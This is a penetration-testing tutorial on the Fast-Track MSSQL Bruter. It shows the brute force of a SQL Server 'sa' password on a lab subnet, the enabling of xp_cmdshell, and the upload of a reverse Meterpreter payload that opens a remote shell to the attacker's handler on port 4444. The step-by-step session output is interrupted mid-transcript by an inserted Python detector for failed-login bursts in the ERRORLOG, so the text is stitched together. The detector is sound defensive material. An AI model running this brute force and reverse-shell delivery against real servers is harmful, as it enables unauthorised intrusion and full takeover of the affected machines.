MSSQL Bruter
Probably one of my favorite aspects of Fast-Track is the MSSQL Bruter. It is probably one of the most robust and unique MSSQL bruters on the market today. When performing internal penetration tests, you will often find that MSSQL "sa" passwords have been overlooked. First, a brief history of the "sa" account is in order. The "sa" account is the system administrator account for MSSQL, and when the server is configured for "Mixed Mode" or "SQL Authentication", the "sa" account is created automatically. Administrators have to enter a password for it at that point and often leave it weak.
Fast-Track attacks this weakness and attempts to identify SQL servers with weak "sa" passwords. Once a password has been guessed, Fast-Track delivers whatever payload you choose through an advanced hex-to-binary conversion that uses the Windows debug utility. Let's scan a class C address space for SQL servers. One thing to note when going through these steps is that you will be prompted whether you want to perform advanced SQL discovery.
To explain this, you first need to understand default installations of SQL Server. By default, the installer puts SQL Server on TCP port 1433. In SQL Server 2005 and later, you can specify dynamic port allocation, which makes the port number somewhat random and hard to identify. Luckily for us, SQL Server also listens on UDP port 1434, which tells us what TCP port the SQL server is running on. When performing the advanced identification, Fast-Track will use the Metasploit auxiliary module to query port 1433 for the ports; otherwise, Fast-Track will only scan for port 1433. Let's look at the SQL Bruter. Note that specifying the advanced discovery takes significantly longer than answering no.
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 3
Microsoft SQL Attack Tools
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 2
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
Enter Option:
Fast-Track has a great list of options so let's take a look at each of them:
- Option 'a', 'attempt SQL Ping and Auto Quick Brute Force', will attempt to scan a range of IP addresses. This uses the same syntax as Nmap and uses a built-in pre-defined dictionary list of about fifty passwords.
- Option 'm', 'mass scan and dictionary brute', will scan a range of IP addresses and allow you to specify a word list of your own. Fast-Track does come with a decent word list located in 'bin/dict' though.
- Option 's', 'single Target (Attack a Single Target with big dictionary)', will allow you to brute force one specific IP address with a large word list.
- Option 'f', 'find SQL Ports (SQL Ping)', will only look for SQL servers and not attack them.
- Option 'i', 'i want a command prompt and know which system is vulnerable', will spawn a command prompt for you if you already know the "sa" password.
- Option 'v', 'vulnerable system, I want to add a local admin on the box...', will add a new administrative user on a box that you know to be vulnerable.
- Option 'e', 'enable xp_cmdshell if its disabled (sql2k and sql2k5)', re-enables xp_cmdshell, the stored procedure Fast-Track uses to execute underlying system commands. By default it is disabled in SQL Server 2005 and above, but Fast-Track can automatically re-enable it if it has been disabled. Note that when attacking the remote system with any of the options, Fast-Track will automatically attempt to re-enable xp_cmdshell just in case.
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
Enter Option: a
Enter username for SQL database (example:sa): sa
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 10.211.55.1/24
Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.
Do you want to perform advanced identification, yes or no: yes
[-] Launching SQL Ping, this may take a while to footprint.... [-]
[*] Please wait while we load the module tree...
Brute forcing username: sa
Be patient this could take awhile...
Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433
SQL Server Compromised: "sa" with password of: "password" on IP 10.211.55.128:1433
Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433
Brute forcing password of Sqlserver on IP 10.211.55.128:1433
Brute forcing password of SqlServer on IP 10.211.55.128:1433
Brute forcing password of Password1 on IP 10.211.55.128:1433
Brute forcing password of xp on IP 10.211.55.128:1433
Brute forcing password of nt on IP 10.211.55.128:1433
Brute forcing password of 98 on IP 10.211.55.128:1433
Brute forcing password of 95 on IP 10.211.55.128:1433
Brute forcing password of 2003 on IP 10.211.55.128:1433
Brute forcing password of 2008 on IP 10.211.55.128:1433
*******************************************
The following SQL Servers were compromised:
*******************************************
1. 10.211.55.128:1433 *** U/N: sa P/W: password ***
*******************************************
To interact with system, enter the SQL Server number.
Example: 1. 192.168.1.32 you would type 1
Enter the number:
Looking at the output above, we have compromised a SQL server at IP address 10.211.55.128 on port 1433 with username "sa" and password "password". We now want full access to this bad boy. There are a lot of options we can specify; in this case we'll use a Meterpreter console, but various other options are available to you.
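Every guess in the run above reaches the server as a failed "sa" login, so from the defender's side the attack is loud. The following is an added example, not code from Fast-Track or Metasploit: a small Python detector that reads SQL Server ERRORLOG text, groups "Login failed for user" lines (error 18456) by login and client address, and raises an alert when a burst of failures inside a time window crosses a threshold. It also flags the pair as compromised when a "Login succeeded" line for the same login and client follows the burst, which is exactly the shape of the session shown above. The log lines are constructed to mirror the real ERRORLOG format; the threshold, window and the helper names are assumptions for this example.

```python
"""Spot password guessing against SQL Server logins in ERRORLOG text.

Added example for this page, not part of Fast-Track or Metasploit. The sample
lines are constructed to mirror what a run like the one above leaves in the
target's ERRORLOG: one error 18456 'Login failed for user' line per guess and,
if the server audits successful logins as well, a 'Login succeeded' line when
the guess lands.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "Login failed/succeeded for user 'x' ... [CLIENT: ip]" as SQL Server writes it.
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<client>[^\]\s]+)\]"
)


def parse_logins(lines):
    """Yield (timestamp, user, client, succeeded) per login line; other lines are skipped."""
    for line in lines:
        m = LOGIN_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group("user"), m.group("client"), m.group("result") == "succeeded"


def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Return one alert per (user, client) pair that racks up `threshold` failed
    logins inside `window`. The alert is flagged `compromised` when a successful
    login for the same pair occurs at or after the start of the burst, which is
    how a guessed "sa" password looks from the server side."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, user, client, ok in parse_logins(lines):
        (successes if ok else failures)[(user, client)].append(ts)

    alerts = []
    for (user, client), times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # Slide the window so times[start..end] spans at most `window`.
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                first = times[start]
                alerts.append({
                    "user": user,
                    "client": client,
                    "first": first,
                    "last": times[-1],
                    "failures": len(times) - start,  # failures from burst start onward
                    "compromised": any(s >= first for s in successes[(user, client)]),
                })
                break  # one alert per pair is enough
    return alerts


def _login_line(ts, result, user, client, reason):
    """Build one constructed ERRORLOG login line (assumed helper, not a real tool)."""
    return (f"{ts:%Y-%m-%d %H:%M:%S}.00 Logon       Login {result} for user "
            f"'{user}'. {reason} [CLIENT: {client}]")


FAILED = "Reason: Password did not match that for the login provided."
SUCCEEDED = "Connection made using SQL Server authentication."
_t0 = datetime(2009, 6, 15, 10, 32, 1)

# Constructed sample: 12 guesses a second apart, then the hit, then two more
# guesses because the tool kept walking its list after the password was found.
SAMPLE_ERRORLOG = [
    "2009-06-15 10:31:40.12 Server      SQL Server is now ready for client connections.",
    _login_line(_t0 - timedelta(minutes=3), "failed", "appuser", "10.211.55.20", FAILED),
]
for i in range(12):
    SAMPLE_ERRORLOG.append(f"{_t0 + timedelta(seconds=i):%Y-%m-%d %H:%M:%S}.00 Logon       "
                           "Error: 18456, Severity: 14, State: 8.")
    SAMPLE_ERRORLOG.append(_login_line(_t0 + timedelta(seconds=i), "failed", "sa", "10.211.55.130", FAILED))
SAMPLE_ERRORLOG.append(_login_line(_t0 + timedelta(seconds=12), "succeeded", "sa", "10.211.55.130", SUCCEEDED))
for i in (13, 14):
    SAMPLE_ERRORLOG.append(_login_line(_t0 + timedelta(seconds=i), "failed", "sa", "10.211.55.130", FAILED))

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_ERRORLOG):
        print(f"{a['user']}@{a['client']}: {a['failures']} failures "
              f"{a['first']:%H:%M:%S}-{a['last']:%H:%M:%S} compromised={a['compromised']}")
```

Two caveats when running this against a real ERRORLOG: SQL Server's default login auditing records failed logins only, so the `compromised` flag only fires if the instance has been set to audit successful logins as well; and a single "appuser" failure from another host is deliberately left below the threshold so that ordinary typos do not page anyone. The threshold of ten failures in five minutes is a starting point to tune, not a recommendation.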
Enter number here: 1
Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)
meterpreter >
Success! We now have full access to this machine. Pretty wicked stuff, and all through guessing the SQL "sa" account. 
